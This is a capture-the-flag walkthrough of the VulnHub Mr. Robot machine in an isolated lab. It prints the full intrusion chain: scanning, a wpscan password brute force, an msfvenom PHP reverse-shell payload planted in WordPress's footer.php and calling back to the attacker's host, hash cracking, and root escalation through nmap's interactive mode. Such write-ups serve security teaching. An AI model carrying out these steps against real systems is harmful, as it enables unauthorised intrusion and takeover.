This is my walk-through of the Mr. Robot CTF challenge posted on vulnhub.com. All testing on this image was performed in an isolated lab environment. Understand that using the tools demonstrated in this walk-through against a host without permission is against the law. Be smart folks, and enjoy the walk-through.
Full NMAP scan of host:
root@kali:~# nmap -p- -A 192.168.1.224
The NMAP scan shows port 80 & 443 open. A quick check with a browser: Lots to read, and videos too:
A Nikto scan against port 80 tell us that the site is running WordPress, and there is a robots.txt file:
root@kali:~# nikto -h http://192.168.1.224
Using Curl to view robots.txt:
root@kali:~# curl -i -L http://192.168.1.224/robots.txt
The robots.txt file contains 2 entries. Our first key, and a dictionary file.
Using Curl to view our first key:
root@kali:~# curl -i -L http://192.168.1.224/key-1-of-3.txt
Downloading the dictionary file using Wget:
root@kali:~/Downloads# wget http://192.168.1.224/fsocity.dic
So we have our first key, where to now? I know that the site is running WordPress and I have a dictionary file that I will assume contains the password for a WordPress user. I ran WPscan and didn’t find anything of use. I tried to enumerate users using both WPscan and Metasploit but no luck. I tried to brute force the admin user with the dictionary file I downloaded, but that did not work either. So now what?
I went back and revisited the website, watched all the videos and viewed the source of all of the pages and I found something of interest. Go back to the main site and type prepare and watch the video:
The video makes reference to a website, whoismrrobot.com. I visited the site and something that stood out on the main page, the name Elliot is listed as a command. Elliot is the main character in the series. I think we have found our WordPress user:
I used WPscan to brute force the password for elliot using the dictionary I previously downloaded. This took several hours, but it worked. Elliot’s password is ER28-0652:
root@kali:~# wpscan -u http://192.168.1.224 –wordlist /root/Downloads/fsocity.dic –username elliot -t 10
Logged into WordPress using Elliot’s credentials:
Elliot is has admin privileges in WordPress. An easy way to get a shell is to create PHP reverse shellcode using Msfvenom and add it one of WordPress PHP files. In my case I will add my PHP code to footer.php.
Creating reverse shellcode using Msfvenom:
root@kali:~# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.233 LPORT=443 -f raw
Pasting my PHP code into the footer.php file. You can navigate here by clicking on appearance–>editor–>footer.php:
Now that I have the shellcode in place, I fire up my Metasploit handler to receive the shell. You can see my options below:
I execute the shellcode using Curl:
Received the shell with Metasploit:
So now I have a low privilege shell. Poking around a bit, I find key 2 but I don’t have privileges to view it. I also find a file that contains the username robot and a MD5 password hash:
I use the hashkiller website to crack the hash. The password for robot is abcdefghijklmnopqrstuvwxyz:
I su to robot ,and I am able to view key 2:
Poking around a bit more. There is a root folder. I am assuming key 3 is there, so we need to escalate privileges on this host. I download the linuxprivchecker.py file to the host and run it. Immediately, I find something interesting:
I run NMAP in interactive mode and drop to a !sh with root privileges. I find key 3 in the root folder as expected:
robot@linux:/tmp$ nmap –interactive
Hope you found this helpful 🙂